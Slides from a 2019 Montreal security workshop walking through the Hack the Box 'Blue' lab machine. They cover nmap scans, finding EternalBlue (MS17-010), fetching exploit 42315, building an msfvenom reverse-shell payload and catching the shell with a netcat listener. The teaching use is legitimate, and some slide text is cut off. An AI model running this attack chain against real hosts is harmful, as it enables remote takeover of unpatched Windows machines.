The expanded set of slides for the Hack the Box workshop presented n 07-Dec-2019 for Nous Sommes Cyber/We Are Cyber group in Montreal

1. WE ARE CYBER/NOUS SOMMES CYBER
MONTREAL 2019
PRESENTED BY DIANA WHITNEY
HTB :
BLUE

2. WHOAMI
• Diana Whitney
• IT Security Specialist at EWA-Canada since 2015
• Payment Assurance Lab – PCI PTS POI Standards testing
• Secure That Cert! CySA+ and PenTest+

3. WHAT WILL WE COVER?
• Quick intro to Hack the Box and the Blue machine
• Reconnaissance
• Vulnerability Identification
• Exploitation
• Walkthrough demo

4. • https://www.hackthebox.eu/
• Deliberately vulnerable machines
• Each one has a unique exploit – test your skills against it
• CVEs
• Enumeration
• Real-Life
• CTF-Like
• Custom Exploitation

6. RECONNAISSANCE
• Gather information about our target
• Open ports – TCP and UDP
• Service identification
• Operating System
• Service/OS Versions
• We will be using Nmap

7. NMAP
• Free but powerful tool
• Host discovery
• Network mapping
• Port scanning
• Version and OS detection
• Customizable scans using Nmap Scripting Engine (NSE)
• Command line and GUI (Zenmap) versions
• Many cheat sheets are available online

8. RECONN WITH NMAP
• nmap -sC -sV -O -oA initial 10.10.10.40
• -sC scans the target using the default Nmap scripts
• -sV attempts to identify the version of services found running on open
ports
• -O attempts to ID the host’s operating systems
• -oA outputs the scan results into a file called ‘initialscan’
• 10.10.10.40 is our target

9. • Port 139 is open and running netbios-ssn
• Port 445 is running Microsoft-ds
• Ports 135, 49152-7 are running msrpc

10. Our scripts used the SMB protocol running on the open ports to lea
more about the host:
• OS – Windows 7 Pro
• Security mode

11. MORE NMAP
• Initial scan only scans the top 1000 ports
• Adding -p- to the command tells nmap to scan all 65535 ports
• To scan UDP ports instead of TCP ports
• nmap -sU -O -p- -oA udpfull 10.10.10.40

12. NMAP VULNERABILITY SCRIPTS
• nmap --script vuln -oA vulnerabilities –p 139,445 10.10.10.40
• Previous scan used nmap’s default scripts – fast and non
invasive
• Vulnerability scripts will look for any potential exploits on the
open ports
• Can be extra slow – scan specific ports using -p

13. • Script smb-vuln-ms17-010 returned a positive result
• Code execution vulnerability in MS SMBv1 servers
• ID ms17-010 is also known as CVE-2017-0143 - EternalBlue

14. • Developed by the NSA and leaked by Shadow Brokers hacker
group in 2017
• Exploits SMBv1, a protocol that allows Windows-based
computers on a local network to share files easily
• Allows a remote attacker to execute arbitrary code on a
vulnerable machine by sending specially crafted packets
• Used in the WannaCry and NotPetya ransomware attacks of
2017
• CVE-2017-0143

15. AWESOME, LET’S EXPLOIT IT!
• Search for available, ‘pre-made’ exploits
• ExploitDB - https://github.com/offensive-security/exploitdb
• Git repository of exploits maintained by Offensive Security
• Searchsploit is a command line search tool for Exploit-DB
• Search available exploits based off the vulnerability’s ID

16. • searchsploit --id ms17-010

17. • searchsploit -m 42315
• Mirrors the exploit onto our machine
• 42315.py

18. LET’S EXAMINE THE CONTENTS OF
42315.PY…
• There will be a function call for ‘mysmb’
• We can get it from the provided URL using wget

19. • File will be saved as 42315.py.1, since we already have a
42315.py
• Change the filename:
• mv 42315.py.1 mysmb.py

20. • The script requires credentials in order to exploit the target
• We find them using enum4linux
• Since ‘none’ is an option, we can assume this machine allows
us to log in with no username or password.

21. • Last we need to modify the python code to add a payload
• This will be the executable file we send to the target machine
and have it run
• To gain access to the target, we’ll send a payload that will set
up a reverse shell request
• Generate the payload using MSFVenom

22. • msfvenom -p windows/shell_reverse_tcp -f exe
LHOST=10.10.14.x LPORT=4444 > eternalblue.exe
• https://redteamtutorials.com/2018/10/24/msfvenom-
cheatsheet/
• -p – our payload – windows/shell_reverse_tcp
• -f format – exe
• LHOST – the IP address of our attack machine (local host) – 10.10.14.7
• Your IP address can be found on HTB ‘Access’ page, or by running ifconfig
• LPORT – a port on our machine – we’ll use 4444 since it’s unlikely that it’s being used for
anything else
• eternalblue.exe – the executable file generated by this command

23. • Alter the script to send eternalblue.exe from its location on the
host machine to the target machine
• Script will then execute eternalblue.exe on the target machine

24. • Use Netcat to set up a listener on the attacking machine
• nc -nvlp 4444
• The attack machine is now listening for an incoming request
from the target machine
• Now run the python script
• python 42315.py 10.10.10.40

25. WHEN the python script runs successfully, the reverse shell request will be
by the attack machine. We now have access to the target. Run ‘whoami’ in
No privilege escalation required – EternalBlue has granted us system ac

26. HTB :
BLUEThank you!